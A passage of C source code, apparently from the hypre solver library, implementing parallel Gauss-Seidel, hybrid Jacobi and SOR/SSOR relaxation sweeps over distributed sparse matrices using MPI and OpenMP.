num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
num_recvs = hypre_ParCSRCommPkgNumRecvs(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
status = hypre_CTAlloc(hypre_MPI_Status, num_recvs+num_sends, HYPRE_MEMORY_HOST);
requests= hypre_CTAlloc(hypre_MPI_Request, num_recvs+num_sends, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
/*
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
} */
/*-----------------------------------------------------------------
* Relax interior points first
*-----------------------------------------------------------------*/
if (relax_points == 0)
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ((A_offd_i[i+1]-A_offd_i[i]) == zero &&
A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
else
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& (A_offd_i[i+1]-A_offd_i[i]) == zero
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
for (p = 0; p < num_procs; p++)
{
jr = 0;
if (p != my_id)
{
for (i = 0; i < num_sends; i++)
{
ip = hypre_ParCSRCommPkgSendProc(comm_pkg, i);
if (ip == p)
{
vec_start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
vec_len = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i+1)-vec_start;
for (j=vec_start; j < vec_start+vec_len; j++)
v_buf_data[j] = u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
hypre_MPI_Isend(&v_buf_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
}
hypre_MPI_Waitall(jr,requests,status);
hypre_MPI_Barrier(comm);
}
else
{
if (num_procs > 1)
{
for (i = 0; i < num_recvs; i++)
{
ip = hypre_ParCSRCommPkgRecvProc(comm_pkg, i);
vec_start = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i);
vec_len = hypre_ParCSRCommPkgRecvVecStart(comm_pkg,i+1)-vec_start;
hypre_MPI_Irecv(&Vext_data[vec_start], vec_len, HYPRE_MPI_REAL,
ip, 0, comm, &requests[jr++]);
}
hypre_MPI_Waitall(jr,requests,status);
}
if (relax_points == 0)
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ((A_offd_i[i+1]-A_offd_i[i]) != zero &&
A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
for (i = 0; i < n; i++)
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& (A_offd_i[i+1]-A_offd_i[i]) != zero
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
if (num_procs > 1)
hypre_MPI_Barrier(comm);
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
hypre_TFree(status, HYPRE_MEMORY_HOST);
hypre_TFree(requests, HYPRE_MEMORY_HOST);
}
}
break;
case 4: /* Hybrid: Jacobi off-processor,
Gauss-Seidel/SOR on-processor
(backward loop) */
{
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
v_buf_data[index++]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data,
Vext_data);
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
res -= A_diag_data[jj] * u_data[ii];
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = hypre_CTAlloc(HYPRE_Real, n, HYPRE_MEMORY_HOST);
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,res0,res2,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
hypre_TFree(tmp_data, HYPRE_MEMORY_HOST);
}
else
{
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
res0 = 0.0;
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
}
if (num_procs > 1)
{
hypre_TFree(Vext_data, HYPRE_MEMORY_HOST);
hypre_TFree(v_buf_data, HYPRE_MEMORY_HOST);
}
}
break;
case 6: /* Hybrid: Jacobi off-processor,
Symm. Gauss-Seidel/ SSOR on-processor
with outer relaxation parameter */
{
if (num_threads > 1)
{
Ztemp_local = hypre_ParVectorLocalVector(Ztemp);
Ztemp_data = hypre_VectorData(Ztemp_local);
}
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
if (num_procs > 1)
{
num_sends = hypre_ParCSRCommPkgNumSends(comm_pkg);
v_buf_data = hypre_CTAlloc(HYPRE_Real,
hypre_ParCSRCommPkgSendMapStart(comm_pkg, num_sends), HYPRE_MEMORY_HOST);
Vext_data = hypre_CTAlloc(HYPRE_Real, num_cols_offd, HYPRE_MEMORY_HOST);
if (num_cols_offd)
{
A_offd_j = hypre_CSRMatrixJ(A_offd);
A_offd_data = hypre_CSRMatrixData(A_offd);
}
index = 0;
for (i = 0; i < num_sends; i++)
{
start = hypre_ParCSRCommPkgSendMapStart(comm_pkg, i);
for (j=start; j < hypre_ParCSRCommPkgSendMapStart(comm_pkg,i+1); j++)
v_buf_data[index++]
= u_data[hypre_ParCSRCommPkgSendMapElmt(comm_pkg,j)];
}
comm_handle = hypre_ParCSRCommHandleCreate( 1, comm_pkg, v_buf_data,
Vext_data);
/*-----------------------------------------------------------------
* Copy current approximation into temporary vector.
*-----------------------------------------------------------------*/
hypre_ParCSRCommHandleDestroy(comm_handle);
comm_handle = NULL;
}
/*-----------------------------------------------------------------
* Relax all points.
*-----------------------------------------------------------------*/
if (relax_weight == 1 && omega == 1)
{
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = ne-1; i > ns-1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res -= A_diag_data[jj] * u_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
else
{
for (i = 0; i < n; i++) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
for (i = n-1; i > -1; i--) /* relax interior points */
{
/*-----------------------------------------------------------
* If i is of the right type ( C or F ) and diagonal is
* nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if (cf_marker[i] == relax_points
&& A_diag_data[A_diag_i[i]] != zero)
{
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res -= A_diag_data[jj] * u_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] = res / A_diag_data[A_diag_i[i]];
}
}
}
}
}
else
{
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
{
Vtemp_data[i] = u_data[i];
}
prod = (1.0-relax_weight*omega);
if (relax_points == 0)
{
if (num_threads > 1)
{
tmp_data = Ztemp_data;
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i) HYPRE_SMP_SCHEDULE
#endif
for (i = 0; i < n; i++)
tmp_data[i] = u_data[i];
#ifdef HYPRE_USING_OPENMP
#pragma omp parallel for private(i,ii,j,jj,ns,ne,res,res0,res2,rest,size) HYPRE_SMP_SCHEDULE
#endif
for (j = 0; j < num_threads; j++)
{
size = n/num_threads;
rest = n - size*num_threads;
if (j < rest)
{
ns = j*size+j;
ne = (j+1)*size+j+1;
}
else
{
ns = j*size+rest;
ne = (j+1)*size+rest;
}
for (i = ns; i < ne; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = ne-1; i > ns-1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res2 = 0.0;
res = f_data[i];
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
if (ii >= ns && ii < ne)
{
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
else
res -= A_diag_data[jj] * tmp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
else
{
for (i = 0; i < n; i++) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
for (i = n-1; i > -1; i--) /* interior points first */
{
/*-----------------------------------------------------------
* If diagonal is nonzero, relax point i; otherwise, skip it.
*-----------------------------------------------------------*/
if ( A_diag_data[A_diag_i[i]] != zero)
{
res0 = 0.0;
res = f_data[i];
res2 = 0.0;
for (jj = A_diag_i[i]+1; jj < A_diag_i[i+1]; jj++)
{
ii = A_diag_j[jj];
res0 -= A_diag_data[jj] * u_data[ii];
res2 += A_diag_data[jj] * Vtemp_data[ii];
}
for (jj = A_offd_i[i]; jj < A_offd_i[i+1]; jj++)
{
ii = A_offd_j[jj];
res -= A_offd_data[jj] * Vext_data[ii];
}
u_data[i] *= prod;
u_data[i] += relax_weight*(omega*res + res0 +
one_minus_omega*res2) / A_diag_data[A_diag_i[i]];
/*u_data[i] += omega*(relax_weight*res + res0 +
one_minus_weight*res2) / A_diag_data[A_diag_i[i]];*/
}
}
}
}
/*-----------------------------------------------------------------
* Relax only C or F points as determined by relax_points.
*-----------------------------------------------------------------*/
else
{
if (num_threads > 1)
{
